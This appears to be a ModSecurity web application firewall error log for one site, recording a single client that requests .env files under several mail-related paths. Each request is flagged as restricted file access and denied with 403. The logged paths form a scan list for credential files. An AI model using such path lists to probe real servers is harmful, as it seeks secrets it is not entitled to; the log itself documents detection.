[Mon May 11 16:33:47.094968 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2QAAAM0"]
[Mon May 11 16:33:47.095228 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2QAAAM0"]
[Mon May 11 16:33:47.258109 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2gAAAM0"]
[Mon May 11 16:33:47.258506 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2gAAAM0"]
[Mon May 11 16:33:47.258696 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2gAAAM0"]
[Mon May 11 16:33:47.258950 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2gAAAM0"]
[Mon May 11 16:33:47.421893 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2wAAAM0"]
[Mon May 11 16:33:47.422294 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2wAAAM0"]
[Mon May 11 16:33:47.422479 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2wAAAM0"]
[Mon May 11 16:33:47.422734 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2wAAAM0"]
[Mon May 11 16:33:47.585390 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3AAAAM0"]
[Mon May 11 16:33:47.585764 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3AAAAM0"]
[Mon May 11 16:33:47.585944 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3AAAAM0"]
[Mon May 11 16:33:47.586206 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3AAAAM0"]
[Mon May 11 16:33:47.748797 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3QAAAM0"]
[Mon May 11 16:33:47.749188 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3QAAAM0"]
[Mon May 11 16:33:47.749374 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3QAAAM0"]
[Mon May 11 16:33:47.749604 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3QAAAM0"]
[Mon May 11 16:33:47.912965 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3wAAAM0"]
[Mon May 11 16:33:47.913336 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3wAAAM0"]
[Mon May 11 16:33:47.913525 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3wAAAM0"]
[Mon May 11 16:33:47.913742 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX3wAAAM0"]
[Mon May 11 16:33:48.076516 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4AAAAM0"]
[Mon May 11 16:33:48.076889 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4AAAAM0"]
[Mon May 11 16:33:48.077086 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4AAAAM0"]
[Mon May 11 16:33:48.077350 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4AAAAM0"]
[Mon May 11 16:33:48.240304 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4QAAAM0"]
[Mon May 11 16:33:48.240679 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4QAAAM0"]
[Mon May 11 16:33:48.240861 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4QAAAM0"]
[Mon May 11 16:33:48.241093 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4QAAAM0"]
[Mon May 11 16:33:48.404364 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4wAAAM0"]
[Mon May 11 16:33:48.404747 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4wAAAM0"]
[Mon May 11 16:33:48.404940 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4wAAAM0"]
[Mon May 11 16:33:48.405202 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHozFV4kyjgo4bQBUhX4wAAAM0"]
[Mon May 11 16:33:48.568074 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5AAAAM0"]
[Mon May 11 16:33:48.568461 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHozFV4kyjgo4bQBUhX5AAAAM0"]
